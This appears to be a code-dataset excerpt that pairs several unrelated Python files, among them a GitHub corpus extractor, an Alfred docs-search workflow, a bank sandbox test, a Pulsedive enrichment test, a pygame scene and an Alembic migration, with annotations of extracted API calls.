"fastapi.HTTPException"
] | [((406, 461), 'fastapi.HTTPException', 'HTTPException', ([], {'status_code': '(400)', 'detail': '"""Invalid token."""'}), "(status_code=400, detail='Invalid token.')\n", (419, 461), False, 'from fastapi import HTTPException\n'), ((512, 586), 'girder_client.GirderClient', 'GirderClient', ([], {'apiUrl': 'settings.GIRDER_API_URL', 'cacheSettings': 'cache_settings'}), '(apiUrl=settings.GIRDER_API_URL, cacheSettings=cache_settings)\n', (524, 586), False, 'from girder_client import GirderClient\n'), ((770, 792), 'msgpack.packb', 'msgpack.packb', (['content'], {}), '(content)\n', (783, 792), False, 'import msgpack\n')] |
import collections
import glob
import json
import os
import random
import re
from typing import Tuple, Iterator, List, Dict, Optional
from src.data.preprocess.example import Example
# Per-language (min, max) bounds on the longest line and total file length;
# files outside these ranges are rejected by GitProjectExtractor._is_good_example.
_DEFAULT_STATS_BOUNDARIES = {
    "Python": {"max_line_len": (37, 741), "content_len": (111, 42476)},
    "Java": {"max_line_len": (56, 177), "content_len": (305, 48661)},
    "Kotlin": {"max_line_len": (25, 158), "content_len": (69, 20402)},
}
# Files whose text matches this (case-insensitive) are treated as generated
# code and dropped.
_BAD_TEXT_REGEX = re.compile(r"auto[- ]?generated file", flags=re.IGNORECASE)
# Number of examples buffered before each in-memory shuffle is flushed.
_BUCKET_SIZE = 1_000_000
class GitProjectExtractor:
    """Walks a scraped-GitHub dataset on disk, groups source files by
    project, splits the projects into train/val/test holdouts and streams
    shuffled ``Example`` objects per holdout."""
    def __init__(
        self,
        raw_data_path: str,
        random_seed: int,
        val_part: Optional[float],
        test_part: Optional[float],
        languages: Tuple[str] = ("Python",),
    ):
        self._path: str = raw_data_path
        self._rng: random.Random = random.Random(random_seed)
        self._found_files_amount: Optional[int] = None
        # Fractions of *projects* (not files) assigned to each holdout;
        # "train" gets whatever val/test leave over.
        self._holdout_sizes: Dict[str, float] = dict()
        self._holdout_sizes["val"] = val_part if val_part is not None else 0.0
        self._holdout_sizes["test"] = test_part if test_part is not None else 0.0
        assert self._holdout_sizes["val"] + self._holdout_sizes["test"] <= 1.0
        self._holdout_sizes["train"] = 1.0 - self._holdout_sizes["val"] - self._holdout_sizes["test"]
        # holdout name -> list of projects; each project is a list of
        # (language, project_name, original_filename, dataset_path) tuples.
        self._processed_projects: Optional[Dict[str, List[List[Tuple[str, str, str, str]]]]] = None
        print(f"Extracting projects metainfo...")
        self._extract_projects(languages)
    def get_num_examples(self, holdout: str) -> int:
        """Approximate number of examples in *holdout*, as a fraction of
        all found files (per-project splitting makes this an estimate)."""
        assert self._found_files_amount is not None
        return int(self._found_files_amount * self._holdout_sizes[holdout])
    # Main method
    def get_examples(self, holdout: str) -> Iterator[Example]:
        """Read all files in the configured languages from the dataset and
        return an iterator over ``Example`` objects.
        :param holdout: which holdout to return. One of "train", "val", "test".
        :return: Iterator over Examples, yielded project by project and
            shuffled in buckets of up to _BUCKET_SIZE.
        """
        return self._generate_examples_iter(holdout)
    # -------------------------------------- Stage methods -------------------------------------- #
    def _extract_projects(self, languages: Tuple[str]):
        # Discover files, group them into projects, then shuffle and split
        # the projects across the holdouts.
        lang_files = self._get_lang_files(languages)
        projects = self._get_files_projects(lang_files)
        found_projects_amount = len(projects)
        (
            processed_projects,
            skipped_projects,
            self._found_files_amount,
        ) = self._process_projects(projects)
        self._processed_projects = dict()
        # Shuffle once (seeded) so the train/val/test split is random but
        # reproducible for a given random_seed.
        self._rng.shuffle(processed_projects)
        train_projects_amount = int(self._holdout_sizes["train"] * len(processed_projects))
        val_projects_amount = int(self._holdout_sizes["val"] * len(processed_projects))
        self._processed_projects["train"] = processed_projects[:train_projects_amount]
        self._processed_projects["val"] = processed_projects[
            train_projects_amount : train_projects_amount + val_projects_amount
        ]
        self._processed_projects["test"] = processed_projects[train_projects_amount + val_projects_amount :]
        print(
            f"Found {found_projects_amount} projects with {self._found_files_amount} files, "
            f"skipped {len(skipped_projects)} projects\n"
        )
        if len(skipped_projects) != 0:
            print(f"Skipped projects: {skipped_projects}\n")
    def _generate_examples_iter(self, holdout: str) -> Iterator[Example]:
        """Yield all project files, one project at a time, filtering out
        bad examples and shuffling in buckets of _BUCKET_SIZE."""
        def read_file(path):
            # Undecodable bytes are dropped rather than raising.
            with open(path, "rt", encoding="utf-8", errors="ignore") as f:
                return f.read()
        bucket_to_shuffle: List[Example] = []
        assert self._processed_projects is not None
        for project in self._processed_projects[holdout]:
            examples = (
                Example(language, proj_name, filename, read_file(path))
                for language, proj_name, filename, path in project
            )
            bucket_to_shuffle.extend(
                example
                for example in examples
                if GitProjectExtractor._is_good_example(example.language, example.file_name, example.source_code)
            )
            # Flush a full bucket so memory stays bounded while still
            # mixing examples across projects.
            if len(bucket_to_shuffle) > _BUCKET_SIZE:
                self._rng.shuffle(bucket_to_shuffle)
                yield from bucket_to_shuffle
                bucket_to_shuffle = []
        yield from bucket_to_shuffle
    @staticmethod
    def _is_good_example(language: str, filename: str, source_code: str) -> bool:
        # Reject empty names/content outright.
        if not filename or not source_code:
            return False
        # Reject files outside the per-language length/line-length bounds.
        if not (
            _DEFAULT_STATS_BOUNDARIES[language]["content_len"][0]
            <= len(source_code)
            <= _DEFAULT_STATS_BOUNDARIES[language]["content_len"][1]
            and _DEFAULT_STATS_BOUNDARIES[language]["max_line_len"][0]
            <= max(len(line) for line in source_code.split("\n"))
            <= _DEFAULT_STATS_BOUNDARIES[language]["max_line_len"][1]
        ):
            return False
        # Reject auto-generated files (see _BAD_TEXT_REGEX).
        if re.search(_BAD_TEXT_REGEX, source_code):
            return False
        return True
    # --------------------------------- Paths processing methods -------------------------------- #
    def _get_lang_files(self, languages: Tuple[str]) -> List[Tuple[str, str]]:
        # Collect every (file path, language) pair found under
        # <raw_data_path>/languages/<language>/...
        res: List[Tuple[str, str]] = []
        for language in languages:
            lang_files = glob.glob(
                os.path.join(
                    self._path,
                    "languages",
                    language,
                    ".*",
                    "*",
                    "*",
                    "**",
                    "*.*",
                ),
                recursive=True,
            )
            assert lang_files, f"There are no files in {self._path} with language {language}"
            print(f"Found {len(lang_files)} files' metainfos for {language} lang")
            res.extend((lang_file, language) for lang_file in lang_files)
        return res
    @staticmethod
    def _get_files_projects(lang_files: List[Tuple[str, str]]) -> List[Tuple[str, List[Tuple[str, str]]]]:
        """Group all files by projects"""
        projects = collections.defaultdict(list)
        for (file, lang) in lang_files:
            if os.path.isfile(file):
                # Project name is the "<author>/<repo>"-like path segment
                # two and three levels above the file.
                project_name = os.sep.join(file.split(os.sep)[-3:-1])
                projects[project_name].append((file, lang))
        return list(projects.items())
    def _process_projects(
        self, projects: List[Tuple[str, List[Tuple[str, str]]]]
    ) -> Tuple[List[List[Tuple[str, str, str, str]]], List[str], int]:
        """Search for projects, extract real project names from dataset
        :param projects: output of _get_files_projects.
        :return: a Tuple,
            first item of which is a List, each item of which represents a single GitHub project
                and is itself a List, each item of which represents a single file in the project
                    which is written in the specified language
                    and is itself a Tuple, first item of which is the path to a file in the project structure,
                        the second one is the path to the file in our dataset structure
                        the third one is the language of the file.
            second item is the list of skipped "<author>/<repo>" names.
            third item is the total number of kept files.
        """
        processed_projects = []
        skipped_projects = []
        files_amount = 0
        for project_name, files in projects:
            # Derive author/repo/branch from the dataset path layout.
            author, repo, branch, filename = files[0][0].split(os.sep)[-4:]
            # paths.json maps dataset file names back to their original
            # in-repository paths.
            paths_dict_path = os.path.join(
                self._path,
                "repositories",
                author,
                repo,
                branch,
                "paths.json",
            )
            if os.path.exists(paths_dict_path):
                with open(paths_dict_path, "rt") as f:
                    paths_dict = json.load(f)
                names_and_paths = []
                for (file, lang) in files:
                    # Keep only files the mapping knows about.
                    if os.path.basename(file) in paths_dict:
                        names_and_paths.append(
                            (
                                lang,
                                project_name,
                                paths_dict[os.path.basename(file)],
                                file,
                            )
                        )
                processed_projects.append(names_and_paths)
                files_amount += len(names_and_paths)
            else:
                # No mapping file => we cannot recover original names; skip.
                skipped_projects.append(f"{author}/{repo}")
        return processed_projects, skipped_projects, files_amount
| [
"os.path.exists",
"re.compile",
"random.Random",
"os.path.join",
"os.path.isfile",
"collections.defaultdict",
"os.path.basename",
"json.load",
"re.search"
] | [((447, 505), 're.compile', 're.compile', (['"""auto[- ]?generated file"""'], {'flags': 're.IGNORECASE'}), "('auto[- ]?generated file', flags=re.IGNORECASE)\n", (457, 505), False, 'import re\n'), ((845, 871), 'random.Random', 'random.Random', (['random_seed'], {}), '(random_seed)\n', (858, 871), False, 'import random\n'), ((5223, 5262), 're.search', 're.search', (['_BAD_TEXT_REGEX', 'source_code'], {}), '(_BAD_TEXT_REGEX, source_code)\n', (5232, 5262), False, 'import re\n'), ((6377, 6406), 'collections.defaultdict', 'collections.defaultdict', (['list'], {}), '(list)\n', (6400, 6406), False, 'import collections\n'), ((6462, 6482), 'os.path.isfile', 'os.path.isfile', (['file'], {}), '(file)\n', (6476, 6482), False, 'import os\n'), ((7777, 7853), 'os.path.join', 'os.path.join', (['self._path', '"""repositories"""', 'author', 'repo', 'branch', '"""paths.json"""'], {}), "(self._path, 'repositories', author, repo, branch, 'paths.json')\n", (7789, 7853), False, 'import os\n'), ((7980, 8011), 'os.path.exists', 'os.path.exists', (['paths_dict_path'], {}), '(paths_dict_path)\n', (7994, 8011), False, 'import os\n'), ((5617, 5693), 'os.path.join', 'os.path.join', (['self._path', '"""languages"""', 'language', '""".*"""', '"""*"""', '"""*"""', '"""**"""', '"""*.*"""'], {}), "(self._path, 'languages', language, '.*', '*', '*', '**', '*.*')\n", (5629, 5693), False, 'import os\n'), ((8101, 8113), 'json.load', 'json.load', (['f'], {}), '(f)\n', (8110, 8113), False, 'import json\n'), ((8218, 8240), 'os.path.basename', 'os.path.basename', (['file'], {}), '(file)\n', (8234, 8240), False, 'import os\n'), ((8461, 8483), 'os.path.basename', 'os.path.basename', (['file'], {}), '(file)\n', (8477, 8483), False, 'import os\n')] |
#!/usr/bin/python
# encoding: utf-8
from __future__ import print_function, unicode_literals, absolute_import
import functools
import re
import sys
from textwrap import wrap
from urllib import quote_plus
from algoliasearch.search_client import SearchClient
from config import Config
from workflow import Workflow3, ICON_INFO
# Algolia client
client = SearchClient.create(Config.ALGOLIA_APP_ID, Config.ALGOLIA_SEARCH_ONLY_API_KEY)
index = client.init_index(Config.ALGOLIA_SEARCH_INDEX)
# log
log = None
def cache_key(query, version=Config.DEFAULT_NOVA_VERSION):
    """Build a filesystem-friendly cache key from *query* and *version*."""
    raw = "{}_{}".format(query, version).lower()
    # Replace every disallowed character with a dash, then collapse runs.
    sanitized = re.sub(r"[^a-z0-9-_;.]", "-", raw)
    return re.sub(r"-+", "-", sanitized)
def handle_result(api_dict):
    """Project a raw Algolia hit down to the fields the workflow displays."""
    wanted = (
        "objectID",
        "version",
        "title",
        "id",
        "permalink",
        "content",
        "categories",
    )
    return {field: api_dict[field] for field in wanted}
def search(query=None, version=Config.DEFAULT_NOVA_VERSION, limit=Config.RESULT_COUNT):
    """Query the Algolia index for *query*, faceted on the docs *version*.

    Returns the list of hits, or an empty list for a blank query or a
    malformed response.
    """
    if not query:
        return []
    params = {
        "facetFilters": ["version:{}".format(version)],
        "page": 0,
        "hitsPerPage": limit,
    }
    results = index.search(query, params)
    if results is not None and "hits" in results:
        return results["hits"]
    return []
def main(wf):
    """Script Filter entry point: parse the Alfred query, search the
    Algolia index (with on-disk caching) and emit result items.

    :param wf: the Workflow3 instance driving this run.
    """
    if wf.update_available:
        # Add a notification to top of Script Filter results
        wf.add_item(
            "New version available",
            "Action this item to install the update",
            autocomplete="workflow:update",
            icon=ICON_INFO,
        )
    query = wf.args[0].strip()
    # Tag prefix only. Treat as blank query
    if query == "v":
        query = ""
    if not query:
        # Nothing typed yet: show a placeholder prompt and bail out.
        wf.add_item("Search the Nova docs...")
        wf.send_feedback()
        return 0
    # Parse query into the search words and an optional version tag.
    words = query.split(" ")
    query = []
    version = Config.DEFAULT_NOVA_VERSION
    for word in words:
        if word in Config.SUPPORTED_NOVA_VERSIONS:
            # A word like "v4.0" selects the docs version instead of
            # being part of the search text.
            version = word.replace("v", "")
        else:
            query.append(word)
    query = " ".join(query)
    # Results are cached per (query, version) key to avoid re-querying
    # Algolia on every keystroke.
    key = cache_key(query, version)
    results = [
        handle_result(result)
        for result in wf.cached_data(
            key, functools.partial(search, query, version), max_age=Config.CACHE_MAX_AGE
        )
    ]
    # Show results
    if not results:
        # Fallback: offer a Google search scoped to Laravel Nova.
        url = "https://www.google.com/search?q={}".format(
            quote_plus('"Laravel Nova" {}'.format(query))
        )
        wf.add_item(
            "No matching answers found",
            "Shall I try and search Google?",
            valid=True,
            arg=url,
            copytext=url,
            quicklookurl=url,
            icon=Config.GOOGLE_ICON,
        )
    for result in results:
        # Subtitle is the first 75-character wrapped chunk of the content.
        subtitle = wrap(result["content"], width=75)[0]
        if len(result["content"]) > 75:
            subtitle += " ..."
        wf.add_item(
            uid=result["objectID"],
            title=result["title"],
            subtitle=subtitle,
            arg=result["permalink"],
            valid=True,
            largetext=result["content"],
            copytext=result["permalink"],
            quicklookurl=result["permalink"],
            icon=Config.NOVA_ICON,
        )
    wf.send_feedback()
if __name__ == "__main__":
    # Alfred invokes this script directly; Workflow3 handles argument
    # parsing, logging and the self-update check.
    wf = Workflow3(
        update_settings={"github_slug": "techouse/alfred-nova-docs", "frequency": 7}
    )
    log = wf.logger
    sys.exit(wf.run(main))
| [
"workflow.Workflow3",
"algoliasearch.search_client.SearchClient.create",
"functools.partial",
"textwrap.wrap",
"re.sub"
] | [((354, 432), 'algoliasearch.search_client.SearchClient.create', 'SearchClient.create', (['Config.ALGOLIA_APP_ID', 'Config.ALGOLIA_SEARCH_ONLY_API_KEY'], {}), '(Config.ALGOLIA_APP_ID, Config.ALGOLIA_SEARCH_ONLY_API_KEY)\n', (373, 432), False, 'from algoliasearch.search_client import SearchClient\n'), ((685, 718), 're.sub', 're.sub', (['"""[^a-z0-9-_;.]"""', '"""-"""', 'key'], {}), "('[^a-z0-9-_;.]', '-', key)\n", (691, 718), False, 'import re\n'), ((730, 752), 're.sub', 're.sub', (['"""-+"""', '"""-"""', 'key'], {}), "('-+', '-', key)\n", (736, 752), False, 'import re\n'), ((3872, 3963), 'workflow.Workflow3', 'Workflow3', ([], {'update_settings': "{'github_slug': 'techouse/alfred-nova-docs', 'frequency': 7}"}), "(update_settings={'github_slug': 'techouse/alfred-nova-docs',\n 'frequency': 7})\n", (3881, 3963), False, 'from workflow import Workflow3, ICON_INFO\n'), ((3315, 3348), 'textwrap.wrap', 'wrap', (["result['content']"], {'width': '(75)'}), "(result['content'], width=75)\n", (3319, 3348), False, 'from textwrap import wrap\n'), ((2666, 2707), 'functools.partial', 'functools.partial', (['search', 'query', 'version'], {}), '(search, query, version)\n', (2683, 2707), False, 'import functools\n')] |
import glob,os,sys
class Path():
'''
>>> paths = Path(source,"*.txt")
>>> for path in paths:
lines = Stream(path)
for line in lines:
print(line)
'''
def __init__(self, source, pattern):
self.source = source
self.pattern = pattern
def __getpaths__(self):
source = os.path.join(self.source, self.pattern)
files = glob.glob(source)
for filename in files:
yield os.path.join(source, filename)
def __iter__(self):
return self.__getpaths__()
class Stream():
'''
>>> lines = Stream(path)
>>> for line in lines:
print(line)
'''
def __init__(self,
encoding=None,
sentencizer=None,
text_filters=[]
):
self.encoding = encoding
self.__sentencizer = sentencizer
self.__text_filters = text_filters
def __call__(self,path):
"""Read lines from filepath."""
with open(path,'r',
encoding = (
self.encoding(path)
if callable(self.encoding)
else self.encoding)
) as fd:
# обрабатываем либо по предложению
if self.__sentencizer:
text = self.preprocess_text(fd.read())
for sentence in self.__sentencizer(text):
yield sentence
# либо по строке
else:
for line in fd:
yield line
def preprocess_text(self,text):
for text_filter in self.__text_filters:
text = text_filter(text)
return text
class Lemmatizer():
def __init__(self, lemmatizer=None,
allowed_tags=set(), disallowed_tags=set()):
self.lemmatize = lemmatizer
self.allowed_tags = set(allowed_tags) - set(disallowed_tags)
def __call__(self,data):
if isinstance(data,(str)):
data = [data]
self.allowed_tags
for lemma,pos in self.lemmatize(data,pos=True):
if self.allowed_tags:
if (self.allowed_tags) and (pos in self.allowed_tags):
yield lemma
else:
yield lemma
class Tokenizer():
def __init__(self,tokenizer=None):
self.tokenize = tokenizer
def __call__(self,data):
return self.tokenize(data)
class CharCleaner():
def __init__(self,cleaners=None):
self.cleaners = cleaners
def __call__(self,data):
for cleaner in self.cleaners:
data = cleaner(data)
return data
class TokenCleaner():
def __init__(self,cleaners=None):
self.cleaners = cleaners
def __call__(self,data):
for cleaner in self.cleaners:
data = cleaner(data)
return data
class LemmaCleaner():
def __init__(self,cleaners=None):
self.cleaners = cleaners
def __call__(self,data):
for cleaner in self.cleaners:
data = cleaner(data)
return data
| [
"os.path.join",
"glob.glob"
] | [((373, 412), 'os.path.join', 'os.path.join', (['self.source', 'self.pattern'], {}), '(self.source, self.pattern)\n', (385, 412), False, 'import glob, os, sys\n'), ((438, 455), 'glob.glob', 'glob.glob', (['source'], {}), '(source)\n', (447, 455), False, 'import glob, os, sys\n'), ((505, 535), 'os.path.join', 'os.path.join', (['source', 'filename'], {}), '(source, filename)\n', (517, 535), False, 'import glob, os, sys\n')] |
import requests
from opbank.opbank_client import OPBankClient
def test_opbank():
requests.delete("http://localhost:8888/admin/storage")
client = OPBankClient()
client.API_URL = 'http://localhost:8000/https://sandbox.apis.op-palvelut.fi/'
payer_iban = 'FI3959986920207073'
receiver_iban = 'FI2350009421535899'
amount = 5
accounts = client.get_accounts()
print('Account list before payment: {}'.format(accounts))
assert 2215.81 == accounts[payer_iban]['balance']
assert 0 == accounts[receiver_iban]['balance']
payment = client.init_payment(payer_iban, receiver_iban, amount)
payment_id = payment['paymentId']
print("Created payment {}".format(payment))
accounts = client.get_accounts()
print('Account list before confirmation: {}'.format(accounts))
assert 2215.81 == accounts[payer_iban]['balance']
assert 0 == accounts[receiver_iban]['balance']
confirmation = client.confirm_payment(payment_id)
accounts = client.get_accounts()
print('Account list after confirmation: {}'.format(accounts))
assert 2210.81 == accounts[payer_iban]['balance']
assert 5 == accounts[receiver_iban]['balance']
| [
"opbank.opbank_client.OPBankClient",
"requests.delete"
] | [((88, 142), 'requests.delete', 'requests.delete', (['"""http://localhost:8888/admin/storage"""'], {}), "('http://localhost:8888/admin/storage')\n", (103, 142), False, 'import requests\n'), ((157, 171), 'opbank.opbank_client.OPBankClient', 'OPBankClient', ([], {}), '()\n', (169, 171), False, 'from opbank.opbank_client import OPBankClient\n')] |
import pytest
from ctrlibrary.core.utils import get_observables
from ctrlibrary.threatresponse.enrich import enrich_refer_observables
from tests.functional.tests.constants import (
MODULE_NAME,
PULSEDIVE_URL,
OBSERVABLE_HUMAN_READABLE_NAME
)
from urllib.parse import quote
@pytest.mark.parametrize(
'observable,observable_type',
(
('1.1.1.1', 'ip'),
('brehmen.com', 'domain'),
('2a01:238:20a:202:1159::', 'ipv6'),
('http://juanthradio.com/Script/DOC/', 'url'),
)
)
def test_positive_refer_observable(module_headers, observable,
observable_type):
"""Perform testing for enrich refer observables endpoint to get
data for observable from Pulsedive
ID: CCTRI-1007-e6401994-dbef-4467-9792-72f80fd2faa1
Steps:
1. Send request to enrich refer observable endpoint
Expectedresults:
1. Check that data in response body contains expected refer field for
observable from Pulsedive
Importance: Critical
"""
observables = [{'type': observable_type, 'value': observable}]
response_from_all_modules = enrich_refer_observables(
payload=observables,
**{'headers': module_headers}
)
references = get_observables(response_from_all_modules, MODULE_NAME)
assert len(references) == 2, 'You got only one entity from Pusledive'
for reference in references:
assert reference['id'].startswith('ref-pulsedive') and (
reference['id'].endswith(
f'{observable_type}-{quote(observable, safe="")}'))
assert reference['module'] == MODULE_NAME
assert reference['module_instance_id']
assert reference['module_type_id']
if reference['title'].startswith('Search'):
assert reference['title'] == (
'Search for this '
f'{OBSERVABLE_HUMAN_READABLE_NAME[observable_type]}')
assert reference['description'] == (
'Lookup this '
f'{OBSERVABLE_HUMAN_READABLE_NAME[observable_type]} '
f'on {MODULE_NAME}')
assert reference['categories'] == [MODULE_NAME, 'Search']
assert reference['url'].startswith(f'{PULSEDIVE_URL}/browse/')
elif reference['title'].startswith('Browse'):
assert reference['title'] == (
f'Browse {OBSERVABLE_HUMAN_READABLE_NAME[observable_type]}')
assert reference['description'] == (
'Browse this '
f'{OBSERVABLE_HUMAN_READABLE_NAME[observable_type]}'
f' on {MODULE_NAME}')
assert reference['categories'] == [MODULE_NAME, 'Browse']
assert reference['url'].startswith(f'{PULSEDIVE_URL}/indicator/')
else:
raise AssertionError(f'Unknown reference: {reference["title"]!r}.')
| [
"pytest.mark.parametrize",
"ctrlibrary.threatresponse.enrich.enrich_refer_observables",
"ctrlibrary.core.utils.get_observables",
"urllib.parse.quote"
] | [((288, 483), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""observable,observable_type"""', "(('1.1.1.1', 'ip'), ('brehmen.com', 'domain'), ('2a01:238:20a:202:1159::',\n 'ipv6'), ('http://juanthradio.com/Script/DOC/', 'url'))"], {}), "('observable,observable_type', (('1.1.1.1', 'ip'), (\n 'brehmen.com', 'domain'), ('2a01:238:20a:202:1159::', 'ipv6'), (\n 'http://juanthradio.com/Script/DOC/', 'url')))\n", (311, 483), False, 'import pytest\n'), ((1136, 1212), 'ctrlibrary.threatresponse.enrich.enrich_refer_observables', 'enrich_refer_observables', ([], {'payload': 'observables'}), "(payload=observables, **{'headers': module_headers})\n", (1160, 1212), False, 'from ctrlibrary.threatresponse.enrich import enrich_refer_observables\n'), ((1253, 1308), 'ctrlibrary.core.utils.get_observables', 'get_observables', (['response_from_all_modules', 'MODULE_NAME'], {}), '(response_from_all_modules, MODULE_NAME)\n', (1268, 1308), False, 'from ctrlibrary.core.utils import get_observables\n'), ((1558, 1584), 'urllib.parse.quote', 'quote', (['observable'], {'safe': '""""""'}), "(observable, safe='')\n", (1563, 1584), False, 'from urllib.parse import quote\n')] |
import pygame
import constants
from player import *
from scene import *
from level01 import *
from level03 import *
from level02 import *
from customscene import *
import titlescene
class GameScene(Scene):
scr_w = constants.SCREENWIDTH
scr_h = constants.SCREENHEIGHT
def __init__(self, levelno):
super(GameScene, self).__init__()
# Create the player
self.player = Player()
self.player.inlevelno = levelno
# Create all the levels
self.level_list = []
self.level_list.append(Level_01(self.player))
self.level_list.append(Level_03(self.player))
# Set the current level
self.current_level_no = levelno
self.current_level = self.level_list[self.current_level_no]
self.player.level = self.current_level
self.active_sprite_list = pygame.sprite.Group()
self.set_player_pos()
# music
pygame.mixer.init()
self.music = pygame.mixer.music.load("music/jumpandrun.ogg")
pygame.mixer.music.play(-1)
def set_player_pos(self):
if self.current_level_no == 0:
self.player.rect.x = 0
self.player.rect.y = self.scr_h - self.player.rect.height
self.active_sprite_list.add(self.player)
else:
print("in player mirror")
self.player.rect.x = constants.SCREENWIDTH - 20
self.player.rect.y = 0
self.active_sprite_list.add(self.player)
def render(self, screen):
# ALL CODE TO DRAW SHOULD GO BELOW THIS COMMENT
self.current_level.draw(screen)
self.active_sprite_list.draw(screen)
# ALL CODE TO DRAW SHOULD GO ABOVE THIS COMMENT
def update(self):
# Update the player.
self.active_sprite_list.update()
# Update items in the level
self.current_level.update()
# If the player gets near the right side, shift the world left (-x)
if self.player.rect.right > self.scr_w:
self.player.rect.right = self.scr_w
# If the player gets near the left side, shift the world right (+x)
if self.player.rect.left < 0:
self.player.rect.left = 0
if self.player.level_completed():
self.player.goal_reached = False
self.current_level_no += 1
if self.current_level_no > len(self.level_list) - 1:
self.exit()
else:
self.current_level = self.level_list[self.current_level_no]
self.manager.go_to(GameScene(self.current_level_no))
def exit(self):
self.manager.go_to(CustomScene("You Won!"))
def die(self):
self.manager.go_to(CustomScene("You lose!"))
def handle_events(self, events):
if not self.current_level_no % 2:
for e in events:
if e.type == pygame.KEYDOWN and e.key == pygame.K_ESCAPE:
self.manager.go_to(titlescene.TitleScene())
if e.type == pygame.KEYDOWN:
if e.key == pygame.K_LEFT:
self.player.go_left()
if e.key == pygame.K_RIGHT:
self.player.go_right()
if e.key == pygame.K_SPACE:
self.player.jump()
if e.type == pygame.KEYUP:
if e.key == pygame.K_LEFT and self.player.change_x < 0:
self.player.stop()
if e.key == pygame.K_RIGHT and self.player.change_x > 0:
self.player.stop()
if e.key == pygame.K_r:
self.set_player_pos()
# skip level (for testing)
if e.key == pygame.K_s:
self.manager.go_to(GameScene(1))
else:
for e in events:
if e.type == pygame.KEYDOWN and e.key == pygame.K_ESCAPE:
self.manager.go_to(titlescene.TitleScene())
if e.type == pygame.KEYDOWN:
if e.key == pygame.K_LEFT:
self.player.go_right()
if e.key == pygame.K_RIGHT:
self.player.go_left()
if e.key == pygame.K_SPACE:
self.player.jump_mirror()
if e.type == pygame.KEYUP:
if e.key == pygame.K_LEFT and self.player.change_x > 0:
self.player.stop()
if e.key == pygame.K_RIGHT and self.player.change_x < 0:
self.player.stop()
if e.key == pygame.K_r:
self.set_player_pos()
#self.current_level.check_keys()
| [
"pygame.mixer.init",
"pygame.sprite.Group",
"titlescene.TitleScene",
"pygame.mixer.music.load",
"pygame.mixer.music.play"
] | [((845, 866), 'pygame.sprite.Group', 'pygame.sprite.Group', ([], {}), '()\n', (864, 866), False, 'import pygame\n'), ((923, 942), 'pygame.mixer.init', 'pygame.mixer.init', ([], {}), '()\n', (940, 942), False, 'import pygame\n'), ((964, 1011), 'pygame.mixer.music.load', 'pygame.mixer.music.load', (['"""music/jumpandrun.ogg"""'], {}), "('music/jumpandrun.ogg')\n", (987, 1011), False, 'import pygame\n'), ((1020, 1047), 'pygame.mixer.music.play', 'pygame.mixer.music.play', (['(-1)'], {}), '(-1)\n', (1043, 1047), False, 'import pygame\n'), ((2950, 2973), 'titlescene.TitleScene', 'titlescene.TitleScene', ([], {}), '()\n', (2971, 2973), False, 'import titlescene\n'), ((3975, 3998), 'titlescene.TitleScene', 'titlescene.TitleScene', ([], {}), '()\n', (3996, 3998), False, 'import titlescene\n')] |
"""Exceptions Table
Revision ID: 6245d75fa12
Revises: <PASSWORD>
Create Date: 2016-08-16 11:35:38.575026
"""
# revision identifiers, used by Alembic.
revision = '6245d75fa12'
down_revision = 'e0a6af364a3f'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('exceptions',
sa.Column('id', sa.BigInteger(), nullable=False),
sa.Column('source', sa.String(length=256), nullable=False),
sa.Column('occurred', sa.DateTime(), nullable=False),
sa.Column('ttl', sa.DateTime(), nullable=False),
sa.Column('type', sa.String(length=256), nullable=False),
sa.Column('message', sa.String(length=512), nullable=True),
sa.Column('stacktrace', sa.Text(), nullable=True),
sa.Column('region', sa.String(length=32), nullable=True),
sa.Column('tech_id', sa.Integer(), nullable=True),
sa.Column('item_id', sa.Integer(), nullable=True),
sa.Column('account_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['account_id'], ['account.id'], ),
sa.ForeignKeyConstraint(['item_id'], ['item.id'], ),
sa.ForeignKeyConstraint(['tech_id'], ['technology.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index('ix_exceptions_account_id', 'exceptions', ['account_id'], unique=False)
op.create_index('ix_exceptions_item_id', 'exceptions', ['item_id'], unique=False)
op.create_index('ix_exceptions_region', 'exceptions', ['region'], unique=False)
op.create_index('ix_exceptions_source', 'exceptions', ['source'], unique=False)
op.create_index('ix_exceptions_tech_id', 'exceptions', ['tech_id'], unique=False)
op.create_index('ix_exceptions_type', 'exceptions', ['type'], unique=False)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_index('ix_exceptions_type', table_name='exceptions')
op.drop_index('ix_exceptions_tech_id', table_name='exceptions')
op.drop_index('ix_exceptions_source', table_name='exceptions')
op.drop_index('ix_exceptions_region', table_name='exceptions')
op.drop_index('ix_exceptions_item_id', table_name='exceptions')
op.drop_index('ix_exceptions_account_id', table_name='exceptions')
op.drop_table('exceptions')
### end Alembic commands ###
| [
"sqlalchemy.ForeignKeyConstraint",
"sqlalchemy.DateTime",
"alembic.op.drop_table",
"sqlalchemy.Text",
"sqlalchemy.PrimaryKeyConstraint",
"sqlalchemy.Integer",
"sqlalchemy.String",
"alembic.op.drop_index",
"sqlalchemy.BigInteger",
"alembic.op.create_index"
] | [((1239, 1330), 'alembic.op.create_index', 'op.create_index', (['"""ix_exceptions_account_id"""', '"""exceptions"""', "['account_id']"], {'unique': '(False)'}), "('ix_exceptions_account_id', 'exceptions', ['account_id'],\n unique=False)\n", (1254, 1330), False, 'from alembic import op\n'), ((1331, 1417), 'alembic.op.create_index', 'op.create_index', (['"""ix_exceptions_item_id"""', '"""exceptions"""', "['item_id']"], {'unique': '(False)'}), "('ix_exceptions_item_id', 'exceptions', ['item_id'], unique=\n False)\n", (1346, 1417), False, 'from alembic import op\n'), ((1417, 1496), 'alembic.op.create_index', 'op.create_index', (['"""ix_exceptions_region"""', '"""exceptions"""', "['region']"], {'unique': '(False)'}), "('ix_exceptions_region', 'exceptions', ['region'], unique=False)\n", (1432, 1496), False, 'from alembic import op\n'), ((1501, 1580), 'alembic.op.create_index', 'op.create_index', (['"""ix_exceptions_source"""', '"""exceptions"""', "['source']"], {'unique': '(False)'}), "('ix_exceptions_source', 'exceptions', ['source'], unique=False)\n", (1516, 1580), False, 'from alembic import op\n'), ((1585, 1671), 'alembic.op.create_index', 'op.create_index', (['"""ix_exceptions_tech_id"""', '"""exceptions"""', "['tech_id']"], {'unique': '(False)'}), "('ix_exceptions_tech_id', 'exceptions', ['tech_id'], unique=\n False)\n", (1600, 1671), False, 'from alembic import op\n'), ((1671, 1746), 'alembic.op.create_index', 'op.create_index', 